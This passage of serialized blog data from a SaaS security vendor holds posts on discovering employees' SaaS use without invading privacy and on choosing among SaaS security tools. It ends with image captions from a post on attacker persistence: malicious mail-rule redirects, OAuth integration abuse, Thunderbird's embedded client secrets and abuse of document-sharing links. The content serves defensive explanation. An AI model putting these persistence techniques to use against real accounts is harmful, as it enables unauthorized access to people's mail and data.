reasonably assume means the platform is being used for work reasons.",{"data":75496,"content":75497,"nodeType":860},{},[75498],{"data":75499,"marks":75500,"value":75501,"nodeType":864},{},[],"We share this with employees up front during the onboarding process and, if you click on the browser extension, it also lets you know which domains it’s monitoring:",{"data":75503,"content":75507,"nodeType":996},{"target":75504},{"sys":75505},{"id":75506,"type":1001,"linkType":1002},"6z1apzuDIaXXN7xIAHEUku",[],{"data":75509,"content":75510,"nodeType":860},{},[75511],{"data":75512,"marks":75513,"value":75514,"nodeType":864},{},[],"This helps our users understand why we are monitoring which SaaS they’re using which in turn makes them aware of the risk we are managing and why.",{"data":75516,"content":75517,"nodeType":860},{},[75518],{"data":75519,"marks":75520,"value":75521,"nodeType":864},{},[],"With this approach we’ve built a comprehensive picture of which SaaS platforms our team is using which has helped us understand where our data lives and which platforms need extra attention to ensure we have all the right controls in place. When our users use a new platform we can reach out to them at the start of their journey to understand what they’re trying to achieve and how we can help them do it securely.",{"data":75523,"content":75524,"nodeType":860},{},[75525,75528,75537],{"data":75526,"marks":75527,"value":21,"nodeType":864},{},[],{"data":75529,"content":75531,"nodeType":883},{"uri":75530},"https://pushsecurity.com/features/saas-discovery",[75532],{"data":75533,"marks":75534,"value":75536,"nodeType":864},{},[75535],{"type":1455},"Learn more about how Push can discover SaaS apps your employees are using",{"data":75538,"marks":75539,"value":75540,"nodeType":864},{},[]," without compromising their privacy. ","How to discover SaaS use without invading employee privacy","Learn how to manage SaaS in a way that keeps employees productive and doesn't compromise privacy.","2022-08-22T00:00:00.000Z","how-to-discover-saas-use-without-invading-employee-privacy",{"items":75546},[75547,75549],{"sys":75548,"name":4904},{"id":4903},{"sys":75550,"name":2729},{"id":2728},{"items":75552},[75553],{"fullName":75554,"firstName":75555,"jobTitle":75556,"profilePicture":75557},"Andy Waugh","Andy","VP Product",{"url":75558},"https://images.ctfassets.net/y1cdw1ablpvd/3Rf76rJn6S9inMb4dUnAIJ/0a787f8141d05b95300e2fe77c4493fa/DSC_6868.jpg",{"__typename":2059,"sys":75560,"content":75562,"title":75889,"synopsis":75890,"hashTags":59,"publishedDate":75891,"slug":75892,"tagsCollection":75893,"authorsCollection":75899},{"id":75561},"4LOMe7ez5adQtwbPireIBc",{"json":75563},{"data":75564,"content":75565,"nodeType":856},{},[75566,75573,75594,75601,75608,75615,75622,75629,75636,75643,75650,75657,75664,75671,75678,75694,75701,75708,75715,75722,75729,75736,75754,75761,75768,75775,75781,75788,75796,75829,75837,75870],{"data":75567,"content":75568,"nodeType":860},{},[75569],{"data":75570,"marks":75571,"value":75572,"nodeType":864},{},[],"As part of your larger cloud security strategy, you’ve likely been asked to focus on how to secure SaaS apps used in your company. The first step to securing SaaS is getting a real sense of what platforms employees are actually using, beyond those that you already know about. Since SaaS is so easy for employees to adopt and start using without any input from IT and security, they’re likely using hundreds of SaaS apps that aren’t even on your radar. The first step in securing something is getting full visibility into what you even need to secure in the first place. ",{"data":75574,"content":75575,"nodeType":860},{},[75576,75580,75590],{"data":75577,"marks":75578,"value":75579,"nodeType":864},{},[],"To help guide folks through how you might do SaaS discovery on your own, we wrote an ",{"data":75581,"content":75585,"nodeType":57700},{"target":75582},{"sys":75583},{"id":75584,"type":1001,"linkType":1002},"45iZ69EdPF4629gZ6yf7p5",[75586],{"data":75587,"marks":75588,"value":75589,"nodeType":864},{},[],"article",{"data":75591,"marks":75592,"value":75593,"nodeType":864},{},[]," about how to manually find what apps employees are using. In it, we explored how to analyze data that you already have on hand to find the unknown apps (shadow IT) used within your business. That’s a pretty significant manual effort, though, and most security teams don’t have the resources to do it. Plus, while these manual attempts can chip away at the SaaS discovery process, none are great at giving you a comprehensive view of SaaS use, nor do they keep up with the constant influx of apps employees are signing up for daily. ",{"data":75595,"content":75596,"nodeType":860},{},[75597],{"data":75598,"marks":75599,"value":75600,"nodeType":864},{},[],"To get truly broad coverage of what SaaS employees are using, you need a large dataset of SaaS apps, the domains associated with them, and this dataset must constantly be updated and expanded to include new apps that are launched every day. ",{"data":75602,"content":75603,"nodeType":860},{},[75604],{"data":75605,"marks":75606,"value":75607,"nodeType":864},{},[],"Unless you can find such a dataset, you must create it. And creating a constantly updated dataset is no small undertaking. That’s why there are so many off-the-shelf solutions and tools that focus solely on SaaS discovery these days. Many say that they are full-scale SaaS security platforms, but what that means isn’t always clear, even after reading product marketing materials. If you were to look at a venn diagram of “SaaS security platforms,” you’d have a giant mess of interlocking circles, with some shared activities amongst all (or most) tools and then vastly different features from that core functionality.",{"data":75609,"content":75610,"nodeType":860},{},[75611],{"data":75612,"marks":75613,"value":75614,"nodeType":864},{},[],"How “good” they are at SaaS discovery really depends on what data they’re using, what they have access to within your environment, the quality of their proprietary datasets (breadth, depth, and timeliness of that data), and how they work with your existing data and tools. To help navigate this mess, we’re sharing some pros and cons of the categories of commercial tools on the market.",{"data":75616,"content":75617,"nodeType":860},{},[75618],{"data":75619,"marks":75620,"value":75621,"nodeType":864},{},[],"To determine which solution you need, you need to consider your tech stack, your specific needs, your risk tolerance, and your short and long term objectives. In this article, we’ll break down some major use cases and match them up with what solutions make the most sense to address them.",{"data":75623,"content":75624,"nodeType":1312},{},[75625],{"data":75626,"marks":75627,"value":75628,"nodeType":864},{},[],"You’re a large enterprise interested in securing core SaaS platforms",{"data":75630,"content":75631,"nodeType":860},{},[75632],{"data":75633,"marks":75634,"value":75635,"nodeType":864},{},[],"\nWorking to only secure 20 or so core applications that have already been sanctioned by the security team? A cloud security posture management (CSPM) or SaaS security posture management (SSPM) solution might be the answer you’re looking for, particularly if you’re on the highest tier license for those apps. ",{"data":75637,"content":75638,"nodeType":860},{},[75639],{"data":75640,"marks":75641,"value":75642,"nodeType":864},{},[],"You can make the most of these tools during in-depth investigations or threat hunting exercises. Leverage them to enforce custom SaaS or cloud app policies as well. The caveat with this one is that you’ll need a fairly sophisticated security team to manage, customize, and run SSPM and CSPM tools.",{"data":75644,"content":75645,"nodeType":860},{},[75646],{"data":75647,"marks":75648,"value":75649,"nodeType":864},{},[],"An ideal environment for these solutions is one that has a full SOC capability so that you extend your existing security monitoring and threat hunting coverage into these core SaaS platforms. You’ll be able to secure a small handful of your business critical applications as long as they’re large and well-established platforms. ",{"data":75651,"content":75652,"nodeType":860},{},[75653],{"data":75654,"marks":75655,"value":75656,"nodeType":864},{},[],"The reason you’ll need top-level licenses and well-established SaaS platforms to make these solutions work is because they rely on API data from those SaaS platforms. Those mature APIs provide necessary information about those core apps that CSPMs and SSPMs use to provide security insights you need to manage the risks. Unfortunately, they won’t cover the dozens of smaller SaaS apps most organizations use, and are normally only available on top license tiers.",{"data":75658,"content":75659,"nodeType":1312},{},[75660],{"data":75661,"marks":75662,"value":75663,"nodeType":864},{},[],"You’re a more traditional, on-prem enterprise interested in blocking unsanctioned SaaS",{"data":75665,"content":75666,"nodeType":860},{},[75667],{"data":75668,"marks":75669,"value":75670,"nodeType":864},{},[],"If your environment is traditional on-site internal networks and you have mature gateway monitoring technology in place already, a cloud access security broker (CASB) may be your best path to securing cloud apps. CASBs work best if you have no employees working from home or on the road or you’re forcing employees to only access work platforms and internet browsers through your corporate VPN.",{"data":75672,"content":75673,"nodeType":860},{},[75674],{"data":75675,"marks":75676,"value":75677,"nodeType":864},{},[],"CASBs typically pull network data such as DNS, SASE, VPN, proxy, and firewall logs. They may also require that you install an agent on each employees’ devices if you want coverage when they are out of the office. ",{"data":75679,"content":75680,"nodeType":860},{},[75681,75685,75690],{"data":75682,"marks":75683,"value":75684,"nodeType":864},{},[],"With those data sources, they provide good aggregate information about SaaS platforms that are accessed. What they ",{"data":75686,"marks":75687,"value":75689,"nodeType":864},{},[75688],{"type":2246},"can’t do well",{"data":75691,"marks":75692,"value":75693,"nodeType":864},{},[]," is provide any insight into how the SaaS app is being used, by which employees (you typically get IP addresses not user names), and for what purpose - as an example, they are typically not able to tell the difference between opening a SaaS product’s homepage, or actually logging into the application - so you are going to have a fairly large number of false positives. ",{"data":75695,"content":75696,"nodeType":860},{},[75697],{"data":75698,"marks":75699,"value":75700,"nodeType":864},{},[],"A CASB also really makes sense if you’re forced into complying with strict regulatory requirements to block everything until you’re able to do an in-depth due diligence process on each app. If your goal (or need) is to block access to unknown, unvetted, or unsanctioned SaaS at the network level with no exceptions, a CASB might be for you.",{"data":75702,"content":75703,"nodeType":1312},{},[75704],{"data":75705,"marks":75706,"value":75707,"nodeType":864},{},[],"You’re a cloud-native company who wants to enable SaaS without introducing too much risk",{"data":75709,"content":75710,"nodeType":860},{},[75711],{"data":75712,"marks":75713,"value":75714,"nodeType":864},{},[],"For cloud-native companies that need better coverage, and are looking for more nuanced controls than network-level blocking, a solution that discovers and secures SaaS through the browser is the way to go. Since employees access SaaS through their browser, it’s a logical step to collect data about who is using what apps through a browser extension. ",{"data":75716,"content":75717,"nodeType":860},{},[75718],{"data":75719,"marks":75720,"value":75721,"nodeType":864},{},[],"The browser approach lets you do true SaaS discovery - so you can find what employees are actually using (not just accessing) and then go about securing those apps. You also don’t need to do much in terms of managing a browser-based solution once it’s set up. It simply runs in the background and surfaces employee SaaS use data into a dashboard. ",{"data":75723,"content":75724,"nodeType":860},{},[75725],{"data":75726,"marks":75727,"value":75728,"nodeType":864},{},[],"By combining browser-level data and robust security APIs from those core business platforms that SSPMs typically tap into, you can get broad visibility of SaaS use in your company for those large in number, but less mature, more up-and-coming apps, and the depth of security data you need for those few core apps that most employees are using. ",{"data":75730,"content":75731,"nodeType":860},{},[75732],{"data":75733,"marks":75734,"value":75735,"nodeType":864},{},[],"The other key benefit of a browser-based approach for SaaS discovery is that you can get incredibly powerful data about who is using the app, how they’re using it, if they’re using security features such as MFA, if they’re reusing passwords across multiple apps, if they’re sharing passwords, when they’ve used it last, and so on. That data is critical when it comes to securing SaaS because the devil truly is in the details. ",{"data":75737,"content":75738,"nodeType":860},{},[75739,75743,75751],{"data":75740,"marks":75741,"value":75742,"nodeType":864},{},[],"If we’ve piqued your interest and you’re curious to see what we can discover about SaaS in your business, ",{"data":75744,"content":75746,"nodeType":883},{"uri":75745},"https://login.pushsecurity.com/",[75747],{"data":75748,"marks":75749,"value":75750,"nodeType":864},{},[],"try the free browser extension",{"data":75752,"marks":75753,"value":10094,"nodeType":864},{},[],{"data":75755,"content":75756,"nodeType":1312},{},[75757],{"data":75758,"marks":75759,"value":75760,"nodeType":864},{},[],"Consider their data sources  ",{"data":75762,"content":75763,"nodeType":860},{},[75764],{"data":75765,"marks":75766,"value":75767,"nodeType":864},{},[],"The critical thing to understand when you’re evaluating if a solution will work for you would be understanding what their data sources are, what weaknesses those data sources inherently have, and what aligns best with your goals. We’ve tried to surface some of that information within the use cases in this article.",{"data":75769,"content":75770,"nodeType":860},{},[75771],{"data":75772,"marks":75773,"value":75774,"nodeType":864},{},[],"So if you’re looking at an EDR that says they can discover SaaS usage, they’ll likely be leveraging endpoint data to detect SaaS use. If you’re looking at CASBs that integrate with your proxy, they’re probably looking at network level data – you get the idea.  ",{"data":75776,"content":75777,"nodeType":1312},{},[75778],{"data":75779,"marks":75780,"value":24968,"nodeType":864},{},[],{"data":75782,"content":75783,"nodeType":860},{},[75784],{"data":75785,"marks":75786,"value":75787,"nodeType":864},{},[],"To wrap this up, we’re going to summarize some key points and provide some questions to ask yourself, your team, or even the vendor of the solution you’re evaluating, as you consider what combination of efforts or what tool is right for you. ",{"data":75789,"content":75790,"nodeType":860},{},[75791],{"data":75792,"marks":75793,"value":75795,"nodeType":864},{},[75794],{"type":899},"Does this solution provide SaaS discovery?",{"data":75797,"content":75798,"nodeType":941},{},[75799,75809,75819],{"data":75800,"content":75801,"nodeType":945},{},[75802],{"data":75803,"content":75804,"nodeType":860},{},[75805],{"data":75806,"marks":75807,"value":75808,"nodeType":864},{},[],"Will this tool find what SaaS apps employees are using, including those you don’t already know about? If so, how? ",{"data":75810,"content":75811,"nodeType":945},{},[75812],{"data":75813,"content":75814,"nodeType":860},{},[75815],{"data":75816,"marks":75817,"value":75818,"nodeType":864},{},[],"Will the tool be able to differentiate between a user visiting a SaaS website, and actually logging into the app? How will it determine who the user is?",{"data":75820,"content":75821,"nodeType":945},{},[75822],{"data":75823,"content":75824,"nodeType":860},{},[75825],{"data":75826,"marks":75827,"value":75828,"nodeType":864},{},[],"If the tool doesn’t provide you with SaaS discovery (finding Shadow IT and the apps employees are using that aren’t on your radar), how will you deal with those apps employees are using without your knowledge?",{"data":75830,"content":75831,"nodeType":860},{},[75832],{"data":75833,"marks":75834,"value":75836,"nodeType":864},{},[75835],{"type":899},"Does the tool provide enough context so you can manage SaaS risk?",{"data":75838,"content":75839,"nodeType":941},{},[75840,75850,75860],{"data":75841,"content":75842,"nodeType":945},{},[75843],{"data":75844,"content":75845,"nodeType":860},{},[75846],{"data":75847,"marks":75848,"value":75849,"nodeType":864},{},[],"Are you getting context about how your users are using apps (are they logging in with social logins or passwords, do they have MFA enabled, are they admins on the app, etc.), or is it only providing generic information about the app?",{"data":75851,"content":75852,"nodeType":945},{},[75853],{"data":75854,"content":75855,"nodeType":860},{},[75856],{"data":75857,"marks":75858,"value":75859,"nodeType":864},{},[],"How will you engage employees that already rely on these SaaS platforms, or want to adopt new apps, can you handle that though email or in-person - or do you need something more scalable?",{"data":75861,"content":75862,"nodeType":945},{},[75863],{"data":75864,"content":75865,"nodeType":860},{},[75866],{"data":75867,"marks":75868,"value":75869,"nodeType":864},{},[],"Do you need the ability to apply progressive controls, or simply need the ability to block apps entirely?",{"data":75871,"content":75872,"nodeType":860},{},[75873,75877,75885],{"data":75874,"marks":75875,"value":75876,"nodeType":864},{},[],"\nIf you aren’t sure about these questions, why not consider what a ",{"data":75878,"content":75880,"nodeType":883},{"uri":75879},"/product",[75881],{"data":75882,"marks":75883,"value":75884,"nodeType":864},{},[],"user-powered security approach",{"data":75886,"marks":75887,"value":75888,"nodeType":864},{},[]," might look like for your organization.","How to find the right SaaS security solution for your organization ","In this guide, we’ll break down some major SaaS use cases and match them up with solutions that can address them, covering pros and cons for each.\n","2022-07-25T00:00:00.000Z","how-to-find-the-right-saas-security-solution-for-your-organization",{"items":75894},[75895,75897],{"sys":75896,"name":4904},{"id":4903},{"sys":75898,"name":2729},{"id":2728},{"items":75900},[75901],{"fullName":10772,"firstName":10773,"jobTitle":10774,"profilePicture":75902},{"url":10776},"embrace-saas-to-move-faster-than-your-competitors","blog/embrace-saas-to-move-faster-than-your-competitors",{"json":75906},{"data":75907,"content":75908,"nodeType":856},{},[75909],{"data":75910,"content":75911,"nodeType":860},{},[75912],{"data":75913,"marks":75914,"value":75915,"nodeType":864},{},[],"One of the questions we hear all the time is, “Can’t I just block my employees from using SaaS that my team hasn’t already vetted and approved?” And the answer is “Yes, you can. You can certainly block the apps we find your employees using, but the real question is ‘Should you?’”","Look at enabling SaaS from a broader understanding of the business and not just the impact to security",{"id":75918,"publishedAt":75919},"6tC3Xqkq7kdTMOvqLMEafp","2026-08-12T11:56:23.643Z",{"items":75921},[75922,75924],{"sys":75923,"name":4904},{"id":4903},{"sys":75925,"name":297},{"id":2732},{"items":75927},[75928,75930,75932,75934,75936,75938,75940,75942,75944,75946,75948,75950,75952,75954],{"sys":75929,"name":279,"slug":280,"tier":31},{"id":276},{"sys":75931,"name":413,"slug":414,"tier":31},{"id":410},{"sys":75933,"name":545,"slug":546,"tier":31},{"id":542},{"sys":75935,"name":642,"slug":643,"tier":31},{"id":639},{"sys":75937,"name":404,"slug":405,"tier":45},{"id":401},{"sys":75939,"name":484,"slug":485,"tier":45},{"id":481},{"sys":75941,"name":324,"slug":325,"tier":45},{"id":321},{"sys":75943,"name":333,"slug":334,"tier":45},{"id":330},{"sys":75945,"name":395,"slug":396,"tier":45},{"id":392},{"sys":75947,"name":607,"slug":608,"tier":45},{"id":604},{"sys":75949,"name":431,"slug":432,"tier":45},{"id":428},{"sys":75951,"name":377,"slug":378,"tier":45},{"id":374},{"sys":75953,"name":475,"slug":476,"tier":45},{"id":472},{"sys":75955,"name":589,"slug":590,"tier":45},{"id":586},"PhHQYsz58S-CFuI0MPA3Ypt9HqK31oerSR9bZ31hOnY",{"id":75958,"title":62629,"authorsCollection":75959,"content":75964,"extension":228,"faqItemsCollection":76457,"faqTitle":59,"featured":6,"hashTags":59,"meta":76459,"metaTitle":76460,"ogImage":59,"postType":5740,"publishedDate":67249,"relatedBlogPostsCollection":76461,"slug":62630,"stem":77310,"subtitle":59,"summary":77311,"synopsis":67248,"sys":77322,"tagsCollection":77324,"topicsCollection":77328,"__hash__":77344},"blog/blog/maintaining-persistent-access-in-a-saas-first-world.json",{"items":75960},[75961],{"fullName":4949,"firstName":4950,"jobTitle":4951,"socialLinks":75962,"profilePicture":75963},[4953],{"url":4955},{"json":75965,"links":76336},{"data":75966,"content":75967,"nodeType":856},{},[75968,75974,75980,75986,75992,75998,76003,76009,76015,76021,76027,76032,76038,76043,76060,76066,76071,76088,76105,76120,76126,76132,76138,76144,76149,76154,76160,76166,76172,76178,76183,76189,76231,76236,76241,76257,76262,76268,76273,76279,76284,76290,76296,76301,76306,76312,76318,76324,76330],{"data":75969,"content":75970,"nodeType":860},{},[75971],{"data":75972,"marks":75973,"value":66824,"nodeType":864},{},[],{"data":75975,"content":75976,"nodeType":860},{},[75977],{"data":75978,"marks":75979,"value":66831,"nodeType":864},{},[],{"data":75981,"content":75982,"nodeType":1009},{},[75983],{"data":75984,"marks":75985,"value":66838,"nodeType":864},{},[],{"data":75987,"content":75988,"nodeType":860},{},[75989],{"data":75990,"marks":75991,"value":66845,"nodeType":864},{},[],{"data":75993,"content":75994,"nodeType":860},{},[75995],{"data":75996,"marks":75997,"value":66852,"nodeType":864},{},[],{"data":75999,"content":76002,"nodeType":996},{"target":76000},{"sys":76001},{"id":66857,"type":1001,"linkType":1002},[],{"data":76004,"content":76005,"nodeType":860},{},[76006],{"data":76007,"marks":76008,"value":66865,"nodeType":864},{},[],{"data":76010,"content":76011,"nodeType":860},{},[76012],{"data":76013,"marks":76014,"value":66872,"nodeType":864},{},[],{"data":76016,"content":76017,"nodeType":860},{},[76018],{"data":76019,"marks":76020,"value":66879,"nodeType":864},{},[],{"data":76022,"content":76023,"nodeType":1312},{},[76024],{"data":76025,"marks":76026,"value":66886,"nodeType":864},{},[],{"data":76028,"content":76031,"nodeType":996},{"target":76029},{"sys":76030},{"id":66891,"type":1001,"linkType":1002},[],{"data":76033,"content":76034,"nodeType":860},{},[76035],{"data":76036,"marks":76037,"value":66899,"nodeType":864},{},[],{"data":76039,"content":76042,"nodeType":996},{"target":76040},{"sys":76041},{"id":66904,"type":1001,"linkType":1002},[],{"data":76044,"content":76045,"nodeType":860},{},[76046,76049,76057],{"data":76047,"marks":76048,"value":66912,"nodeType":864},{},[],{"data":76050,"content":76053,"nodeType":57700},{"target":76051},{"sys":76052},{"id":66917,"type":1001,"linkType":1002},[76054],{"data":76055,"marks":76056,"value":66922,"nodeType":864},{},[],{"data":76058,"marks":76059,"value":2924,"nodeType":864},{},[],{"data":76061,"content":76062,"nodeType":1312},{},[76063],{"data":76064,"marks":76065,"value":66932,"nodeType":864},{},[],{"data":76067,"content":76070,"nodeType":996},{"target":76068},{"sys":76069},{"id":66937,"type":1001,"linkType":1002},[],{"data":76072,"content":76073,"nodeType":860},{},[76074,76077,76085],{"data":76075,"marks":76076,"value":66945,"nodeType":864},{},[],{"data":76078,"content":76081,"nodeType":57700},{"target":76079},{"sys":76080},{"id":66950,"type":1001,"linkType":1002},[76082],{"data":76083,"marks":76084,"value":66922,"nodeType":864},{},[],{"data":76086,"marks":76087,"value":10094,"nodeType":864},{},[],{"data":76089,"content":76090,"nodeType":860},{},[76091,76094,76102],{"data":76092,"marks":76093,"value":66964,"nodeType":864},{},[],{"data":76095,"content":76098,"nodeType":57700},{"target":76096},{"sys":76097},{"id":66969,"type":1001,"linkType":1002},[76099],{"data":76100,"marks":76101,"value":22602,"nodeType":864},{},[],{"data":76103,"marks":76104,"value":66977,"nodeType":864},{},[],{"data":76106,"content":76107,"nodeType":860},{},[76108,76111,76117],{"data":76109,"marks":76110,"value":66984,"nodeType":864},{},[],{"data":76112,"content":76113,"nodeType":883},{"uri":66987},[76114],{"data":76115,"marks":76116,"value":66992,"nodeType":864},{},[],{"data":76118,"marks":76119,"value":66996,"nodeType":864},{},[],{"data":76121,"content":76122,"nodeType":1312},{},[76123],{"data":76124,"marks":76125,"value":67003,"nodeType":864},{},[],{"data":76127,"content":76128,"nodeType":860},{},[76129],{"data":76130,"marks":76131,"value":67010,"nodeType":864},{},[],{"data":76133,"content":76134,"nodeType":860},{},[76135],{"data":76136,"marks":76137,"value":67017,"nodeType":864},{},[],{"data":76139,"content":76140,"nodeType":860},{},[76141],{"data":76142,"marks":76143,"value":67024,"nodeType":864},{},[],{"data":76145,"content":76148,"nodeType":996},{"target":76146},{"sys":76147},{"id":67029,"type":1001,"linkType":1002},[],{"data":76150,"content":76153,"nodeType":996},{"target":76151},{"sys":76152},{"id":67035,"type":1001,"linkType":1002},[],{"data":76155,"content":76156,"nodeType":1312},{},[76157],{"data":76158,"marks":76159,"value":67043,"nodeType":864},{},[],{"data":76161,"content":76162,"nodeType":860},{},[76163],{"data":76164,"marks":76165,"value":67050,"nodeType":864},{},[],{"data":76167,"content":76168,"nodeType":860},{},[76169],{"data":76170,"marks":76171,"value":67057,"nodeType":864},{},[],{"data":76173,"content":76174,"nodeType":860},{},[76175],{"data":76176,"marks":76177,"value":67064,"nodeType":864},{},[],{"data":76179,"content":76182,"nodeType":996},{"target":76180},{"sys":76181},{"id":67069,"type":1001,"linkType":1002},[],{"data":76184,"content":76185,"nodeType":860},{},[76186],{"data":76187,"marks":76188,"value":67077,"nodeType":864},{},[],{"data":76190,"content":76191,"nodeType":941},{},[76192,76205,76218],{"data":76193,"content":76194,"nodeType":945},{},[76195],{"data":76196,"content":76197,"nodeType":860},{},[76198,76202],{"data":76199,"marks":76200,"value":67091,"nodeType":864},{},[76201],{"type":899},{"data":76203,"marks":76204,"value":67095,"nodeType":864},{},[],{"data":76206,"content":76207,"nodeType":945},{},[76208],{"data":76209,"content":76210,"nodeType":860},{},[76211,76215],{"data":76212,"marks":76213,"value":67106,"nodeType":864},{},[76214],{"type":899},{"data":76216,"marks":76217,"value":67110,"nodeType":864},{},[],{"data":76219,"content":76220,"nodeType":945},{},[76221],{"data":76222,"content":76223,"nodeType":860},{},[76224,76228],{"data":76225,"marks":76226,"value":67121,"nodeType":864},{},[76227],{"type":899},{"data":76229,"marks":76230,"value":67125,"nodeType":864},{},[],{"data":76232,"content":76235,"nodeType":996},{"target":76233},{"sys":76234},{"id":67130,"type":1001,"linkType":1002},[],{"data":76237,"content":76240,"nodeType":996},{"target":76238},{"sys":76239},{"id":67136,"type":1001,"linkType":1002},[],{"data":76242,"content":76243,"nodeType":941},{},[76244],{"data":76245,"content":76246,"nodeType":945},{},[76247],{"data":76248,"content":76249,"nodeType":860},{},[76250,76254],{"data":76251,"marks":76252,"value":67151,"nodeType":864},{},[76253],{"type":899},{"data":76255,"marks":76256,"value":67155,"nodeType":864},{},[],{"data":76258,"content":76261,"nodeType":996},{"target":76259},{"sys":76260},{"id":67160,"type":1001,"linkType":1002},[],{"data":76263,"content":76264,"nodeType":860},{},[76265],{"data":76266,"marks":76267,"value":67168,"nodeType":864},{},[],{"data":76269,"content":76272,"nodeType":996},{"target":76270},{"sys":76271},{"id":67173,"type":1001,"linkType":1002},[],{"data":76274,"content":76275,"nodeType":1312},{},[76276],{"data":76277,"marks":76278,"value":67181,"nodeType":864},{},[],{"data":76280,"content":76283,"nodeType":996},{"target":76281},{"sys":76282},{"id":67186,"type":1001,"linkType":1002},[],{"data":76285,"content":76286,"nodeType":860},{},[76287],{"data":76288,"marks":76289,"value":67194,"nodeType":864},{},[],{"data":76291,"content":76292,"nodeType":860},{},[76293],{"data":76294,"marks":76295,"value":67201,"nodeType":864},{},[],{"data":76297,"content":76300,"nodeType":996},{"target":76298},{"sys":76299},{"id":67206,"type":1001,"linkType":1002},[],{"data":76302,"content":76305,"nodeType":996},{"target":76303},{"sys":76304},{"id":67212,"type":1001,"linkType":1002},[],{"data":76307,"content":76308,"nodeType":1312},{},[76309],{"data":76310,"marks":76311,"value":24968,"nodeType":864},{},[],{"data":76313,"content":76314,"nodeType":860},{},[76315],{"data":76316,"marks":76317,"value":67226,"nodeType":864},{},[],{"data":76319,"content":76320,"nodeType":860},{},[76321],{"data":76322,"marks":76323,"value":67233,"nodeType":864},{},[],{"data":76325,"content":76326,"nodeType":860},{},[76327],{"data":76328,"marks":76329,"value":67240,"nodeType":864},{},[],{"data":76331,"content":76332,"nodeType":860},{},[76333],{"data":76334,"marks":76335,"value":67247,"nodeType":864},{},[],{"entries":76337},{"inline":76338,"hyperlink":76339,"block":76352},[],[76340,76344,76348],{"sys":76341,"__typename":2059,"title":76342,"slug":76343},{"id":66917},"Email security: How hackers use mail rules to access your inbox","email-security-how-hackers-use-mail-rules-to-access-your-inbox",{"sys":76345,"__typename":2059,"title":76346,"slug":76347},{"id":66950},"Is it safe to allow my employees to connect third-party apps to our M365/Google Workspace tenant?","is-it-safe-to-allow-my-employees-to-connect-third-party-apps-to-our-m365",{"sys":76349,"__typename":2059,"title":76350,"slug":76351},{"id":66969},"Consent phishing: the emerging phishing technique that can bypass 2FA","consent-phishing-the-emerging-phishing-technique-that-can-bypass-2fa",[76353,76362,76368,76376,76382,76390,76398,76406,76414,76422,76429,76436,76442,76449],{"sys":76354,"__typename":1724,"title":76355,"caption":76356,"layoutMode":76357,"file":76358},{"id":66857},"Old way of getting persistent access","The old way: an attacker gains persistent access through the user's endpoint","Breaks margins",{"url":76359,"width":76360,"height":76361},"https://images.ctfassets.net/y1cdw1ablpvd/60dTfWyVxckPEi4bZ6kWxn/49d8540f39641a0a1089cc313a9bc0c0/diagram6.png",2994,1534,{"sys":76363,"__typename":1724,"title":76364,"caption":76365,"layoutMode":76357,"file":76366},{"id":66891},"Abusing Mail Rules for persistence","An attacker abusing mail rules to gain persistent access",{"url":76367,"width":76360,"height":76361},"https://images.ctfassets.net/y1cdw1ablpvd/4R33B9Ru2d5LJilWS3CHWH/ff46bfc18072e03159b10571c87fef20/diagram4.png",{"sys":76369,"__typename":1724,"title":76370,"caption":76371,"layoutMode":76357,"file":76372},{"id":66904},"Mail rules settings","Example of a malicious mail rule redirect",{"url":76373,"width":76374,"height":76375},"https://images.ctfassets.net/y1cdw1ablpvd/2nA7CzgPsU4MjyGLpP9PsU/4cb3ff9bd512140dddc648324ba43db1/image6.png",930,408,{"sys":76377,"__typename":1724,"title":76378,"caption":76379,"layoutMode":76357,"file":76380},{"id":66937},"OAuth integration attacks","Attacker uses OAuth integrations to gain persistent access",{"url":76381,"width":76360,"height":76361},"https://images.ctfassets.net/y1cdw1ablpvd/3U42FTCg8KCkTWuFHgCzQn/d80952f23e2d3953683d14874422a013/diagram3.png",{"sys":76383,"__typename":1724,"title":76384,"caption":76385,"layoutMode":70327,"file":76386},{"id":67029},"Abusing SaaS integrations","Abusing a legitimate app to create custom permissions for data access",{"url":76387,"width":76388,"height":76389},"https://images.ctfassets.net/y1cdw1ablpvd/6waVV1s0GnugIX5kIEWie0/73ce4f1c6427a09f2fd9c1115abc2cab/image5.png",481,666,{"sys":76391,"__typename":1724,"title":76392,"caption":76393,"layoutMode":70327,"file":76394},{"id":67035},"Granting access to OneDrive","Using Canva to gain access to OneDrive",{"url":76395,"width":76396,"height":76397},"https://images.ctfassets.net/y1cdw1ablpvd/1s19UrmAhp4CtP2gY7Les1/63e51fb3f4b6e442e22308606fab5263/image7.png",781,498,{"sys":76399,"__typename":1724,"title":76400,"caption":76401,"layoutMode":70327,"file":76402},{"id":67069},"Mozilla Thunderbird source code","Thunderbird stores client IDs and secrets for different OAuth apps in the source code ",{"url":76403,"width":76404,"height":76405},"https://images.ctfassets.net/y1cdw1ablpvd/9hMtg79YP1fxq9kGCgz6v/e1bd3be4b7b057a905b288d04455f6b3/image9.png",740,447,{"sys":76407,"__typename":1724,"title":76408,"caption":76409,"layoutMode":59,"file":76410},{"id":67130},"Thunderbird permissions","Abusing Thunderbird for arbitrary permission granting",{"url":76411,"width":76412,"height":76413},"https://images.ctfassets.net/y1cdw1ablpvd/1fpNoUuQEh8GMWqBeaNyxa/9df618a9231bb056d82cad10cef3f757/image3.png",522,896,{"sys":76415,"__typename":1724,"title":76416,"caption":76417,"layoutMode":70327,"file":76418},{"id":67136},"Thunderbird access beyond email","We're able to grant access to whatever we want, not just email",{"url":76419,"width":76420,"height":76421},"https://images.ctfassets.net/y1cdw1ablpvd/4J4mjQTSDiMtQqI6J90f4t/d88cdfb54bd033324ef398cff76fe525/image__9_.png",1744,432,{"sys":76423,"__typename":1724,"title":76424,"caption":59,"layoutMode":70327,"file":76425},{"id":67160},"Google restricted scope",{"url":76426,"width":76427,"height":76428},"https://images.ctfassets.net/y1cdw1ablpvd/3Codlm2s4TvG1v2B6ZWQyM/39c705a48add202154bb333bdefdc899/image4.png",651,253,{"sys":76430,"__typename":1724,"title":76431,"caption":76432,"layoutMode":70327,"file":76433},{"id":67173},"Thunderbird email access","Using the Thunderbird app to gain access to Gmail",{"url":76434,"width":59162,"height":76435},"https://images.ctfassets.net/y1cdw1ablpvd/5yxmeq6vfcETgn4B9oWfhE/b4b3af6ce3e17a5ff06f1b49fd2b4016/image8.png",779,{"sys":76437,"__typename":1724,"title":76438,"caption":76439,"layoutMode":76357,"file":76440},{"id":67186},"Abusing document-sharing links","An attacker abusing document-sharing links to get persistent 